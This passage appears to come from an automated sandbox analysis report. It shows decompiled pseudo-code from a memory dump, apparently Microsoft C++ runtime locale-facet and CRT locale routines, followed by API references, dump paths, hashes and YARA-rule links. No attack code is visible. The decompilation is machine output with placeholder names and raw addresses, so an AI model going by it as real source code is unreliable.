																_t739 =  *0x6d546dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6D46161C(0x6d546d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6D4866BA(_t770 - 0x14);
																	return E6D4A0075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6D4910BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t770 - 0x20);
																			E6D4A3D74(_t770 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t544, _t721, _t739, 0x14);
																			E6D486653(_t770 - 0x14, 0);
																			_t740 =  *0x6d546df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6D46161C(0x6d546da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6D4866BA(_t770 - 0x14);
																				return E6D4A0075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6D491127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t770 - 0x20);
																						E6D4A3D74(_t770 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t544, _t722, _t740, 0x14);
																						E6D486653(_t770 - 0x14, 0);
																						_t741 =  *0x6d546df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6D46161C(0x6d546da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6D4866BA(_t770 - 0x14);
																							return E6D4A0075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6D4911AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t770 - 0x20);
																									E6D4A3D74(_t770 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t544, _t723, _t741, 0x14);
																									E6D486653(_t770 - 0x14, 0);
																									_t742 =  *0x6d546dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6D46161C(0x6d546d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6D4866BA(_t770 - 0x14);
																										return E6D4A0075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6D491230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t770 - 0x20);
																												E6D4A3D74(_t770 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t544, _t724, _t742, 0x14);
																												E6D486653(_t770 - 0x14, 0);
																												_t743 =  *0x6d546dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6D46161C(0x6d546d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6D4866BA(_t770 - 0x14);
																													return E6D4A0075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6D4912B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t770 - 0x20);
																															E6D4A3D74(_t770 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t544, _t725, _t743, 0x14);
																															E6D486653(_t770 - 0x14, 0);
																															_t744 =  *0x6d546dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6D46161C(0x6d546d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6D4866BA(_t770 - 0x14);
																																return E6D4A0075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6D491339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t770 - 0x20);
																																		E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t544, _t726, _t744, 0x14);
																																		E6D486653(_t770 - 0x14, 0);
																																		_t745 =  *0x6d546db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6D46161C(0x6d546d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6D4866BA(_t770 - 0x14);
																																			return E6D4A0075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6D4913A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t770 - 0x20);
																																					E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t544, _t727, _t745, 0x14);
																																					E6D486653(_t770 - 0x14, 0);
																																					_t746 =  *0x6d546ddc; // 0x0
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6D46161C(0x6d546d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6D4866BA(_t770 - 0x14);
																																						return E6D4A0075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6D491409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t770 - 0x20);
																																								E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t544, _t728, _t746, 0x14);
																																								E6D486653(_t770 - 0x14, 0);
																																								_t747 =  *0x6d546de0; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6D46161C(0x6d546d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6D4866BA(_t770 - 0x14);
																																									return E6D4A0075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6D491471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t770 - 0x20);
																																											E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t544, _t729, _t747, 0x14);
																																											E6D486653(_t770 - 0x14, 0);
																																											_t748 =  *0x6d546dfc; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6D46161C(0x6d546da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6D4866BA(_t770 - 0x14);
																																												return E6D4A0075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6D4914EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t770 - 0x20);
																																														E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t544, _t730, _t748, 0x14);
																																														E6D486653(_t770 - 0x14, 0);
																																														_t749 =  *0x6d546dcc; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6D46161C(0x6d546d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6D4866BA(_t770 - 0x14);
																																															return E6D4A0075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6D491558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D461438(_t770 - 0x20);
																																																	E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e83cf, _t544, _t731, _t749, 0x14);
																																																	E6D486653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6d546e00; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6D46161C(0x6d546dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6D4866BA(_t770 - 0x14);
																																																		return E6D4A0075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6D4915C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D461438(_t770 - 0x20);
																																																				E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																																				asm("int3");
																																																				E6D4A00AC(0x6d4e83cf, _t544, _t732, _t750, 0x14);
																																																				E6D486653(_t770 - 0x14, 0);
																																																				_t751 =  *0x6d546dd0; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6D46161C(0x6d546d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6D4866BA(_t770 - 0x14);
																																																					return E6D4A0075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6D49162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6D461438(_t663);
																																																							E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																																							asm("int3");
																																																							E6D4A00AC(0x6d4e851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6d4ec0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6D49542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6D4A0075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6D486FD3(__eflags, _t733);
																																																							 *0x6d4ea26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6d546dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6D486FD3(__eflags, _t732);
																																																				 *0x6d4ea26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6d546e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6D486FD3(__eflags, _t731);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6d546dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6D486FD3(__eflags, _t730);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6d546dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6D486FD3(__eflags, _t729);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6d546de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6D486FD3(__eflags, _t728);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6d546ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6D486FD3(__eflags, _t727);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6d546db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6D486FD3(__eflags, _t726);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6d546dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6D486FD3(__eflags, _t725);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6d546dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6D486FD3(__eflags, _t724);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6d546dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6D486FD3(__eflags, _t723);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6d546df4 = _t723;
																									goto L47;
																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6D486FD3(__eflags, _t722);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6d546df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6D486FD3(__eflags, _t721);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6d546dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6D486FD3(__eflags, _t720);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6d546df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6D486FD3(__eflags, _t719);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6d546dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6D486FD3(__eflags, _t718);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6d546dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6D486FD3(__eflags, _t717);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6d546db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F230
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F23A
int.LIBCPMT ref: 6D48F251

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

messages.LIBCPMT ref: 6D48F274
std::_Facet_Register.LIBCPMT ref: 6D48F28B
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F2AB
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F2C9

Strings

lmTm, xrefs: 6D48F245

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID: lmTm
API String ID: 438560357-4251929185
Opcode ID: 3bc7f7ec8e73072a3ffcbd582abafe65f7aecae566a2dcd9908e461a33ff6eef
Instruction ID: 5795e35fcce4501b48af2c2e705dcfe960ea6ccc4669932d51686c91099163e0
Opcode Fuzzy Hash: 3bc7f7ec8e73072a3ffcbd582abafe65f7aecae566a2dcd9908e461a33ff6eef
Instruction Fuzzy Hash: BA11E0768082199BCF01EBA0C844EEDB774AF94314F2A410CD611BB395CB75DE0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CE984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D4CE984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6d54506c; // 0xff2bc58a
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6D4CD5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6D4CDE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6D4CF26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6D4C91A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6D4C2188();
									asm("int3");
									_t171 =  *0x6d5476f0; // 0x4f47a8
									 *0x6d545108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6d5451c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6d5451ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6D4CDB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6D4D6102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6d4f0ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6D4A1C3C( &_v528,  *0x6d5451e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6d4f0de8; // 0x6d48815c
									 *0x6d4ea26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6d5452b0;
										if(_t233 != 0x6d5452b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
